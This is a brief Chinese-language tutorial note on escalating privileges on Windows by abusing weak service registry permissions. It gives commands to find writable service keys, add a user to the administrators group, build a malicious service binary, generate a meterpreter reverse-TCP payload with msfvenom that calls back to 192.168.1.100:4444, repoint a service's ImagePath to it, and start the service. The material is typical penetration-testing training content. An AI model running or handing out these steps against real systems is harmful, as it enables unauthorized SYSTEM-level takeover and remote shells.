windows服务之注册表提权

b站上的视频教程

用户权限

NT Authority \ SYSTEM又称LocalSystem帐户是内置的Windows帐户。 它是Windows本地实例上功能最强大的帐户（比任何管理员帐户都更强大）。 大多数系统级别（Windows Services）服务和其他一些第三方服务都在帐户中运行

NT Authority \ SYSTEM 是Builtin\Administrator 是系统管理员之一

NT AUTHORITY\INTERACTIVE

交互式用户是当前登录到运行COM服务器的计算机的用户。 如果将身份设置为交互式用户，并且服务器将其类工厂注册为多用途，则所有客户端都将使用服务器的同一实例。

注册表

powershell
Get-Acl -Path hklm:\System\CurrentControlSet\services\* | select Path,AccessToString | Format-List > 1.txt
查找1.txt “ NT AUTHORITY\INTERACTIVE ”
---
powershell
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

生成伪造的服务

编译windows_service.c

cmd.exe /k net localgroup administrators user /add

x86_64-w64-mingw32-gcc windows_service.c -o x.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe-service -o x.exe

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

sc start regsvc

net user user